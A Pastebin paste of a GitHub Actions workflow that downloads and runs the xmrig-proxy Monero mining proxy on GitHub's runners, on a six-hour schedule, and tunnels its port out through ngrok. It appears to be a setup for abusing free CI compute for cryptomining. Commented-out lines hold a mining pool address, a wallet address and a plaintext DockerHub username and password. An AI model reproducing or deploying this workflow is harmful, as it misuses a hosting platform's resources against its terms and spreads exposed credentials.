Advertisement
xloader

github-MO-xmrig-proxy.yaml

May 13th, 2021
1,322
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
YAML 1.49 KB | None | 0 0
  1. name: CI
  2.  
  3. on:
  4.   push:
  5.     branches: [ main ]
  6.   pull_request:
  7.     branches: [ main ]
  8.  
  9.   schedule:
  10.   - cron: "0 */6 * * *"
  11.  
  12.   workflow_dispatch:
  13. jobs:
  14.   build:
  15.     runs-on: ubuntu-latest
  16.  
  17.     steps:
  18.       - uses: actions/checkout@v2
  19.      
  20.       - name: Download
  21.         run: wget -c https://github.com/MoneroOcean/xmrig-proxy/releases/download/v6.12.0-mo2/xmrig-proxy-v6.12.0-mo2-lin64.tar.gz
  22.       - name: extract
  23.         run: tar -xvzf xmrig-proxy-v6.12.0-mo2-lin64.tar.gz
  24.       - name: check
  25.         run: ls -la
  26.       - name: check config
  27.         run: cat config-git.json
  28.       - name: run 2
  29.         run: ./xmrig-proxy --config=config-git.json
  30. #       - name: run
  31. #         run: ./xmrig-proxy-6.12.0/xmrig-proxy --background --coin=monero -o gulf.moneroocean.stream:10016 -u 89NzwwgSuwqabDWRfXZbSmDrZLFCg1QbwTSLkL23BwZTL1BjArqR9H8JZKrAP2esRtAaEpRLAUp81QjsFndqJVrhEBSwWy3 -p x --bind 0.0.0.0:3333 --bind 0.0.0.0:5555
  32. #       - name: Login to DockerHub
  33. #         run: docker login -u inbox101 -p kurakuraku1996
  34.  
  35. #       - name: Run a multi-line script
  36. #         run: docker run --restart unless-stopped runningbeta/xmrig-proxy -o gulf.moneroocean.stream:10016 -u 89NzwwgSuwqabDWRfXZbSmDrZLFCg1QbwTSLkL23BwZTL1BjArqR9H8JZKrAP2esRtAaEpRLAUp81QjsFndqJVrhEBSwWy3 -p proxy --bind 0.0.0.0:3333 --bind 0.0.0.0:5555
  37.       - uses: apogiatzis/ngrok-tunneling-action@v0.1.4
  38.         with:
  39.           timeout: 6h
  40.           port: 5555
  41.           ngrok_authtoken: ${{ secrets.NGROK_AUTHTOKEN }}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement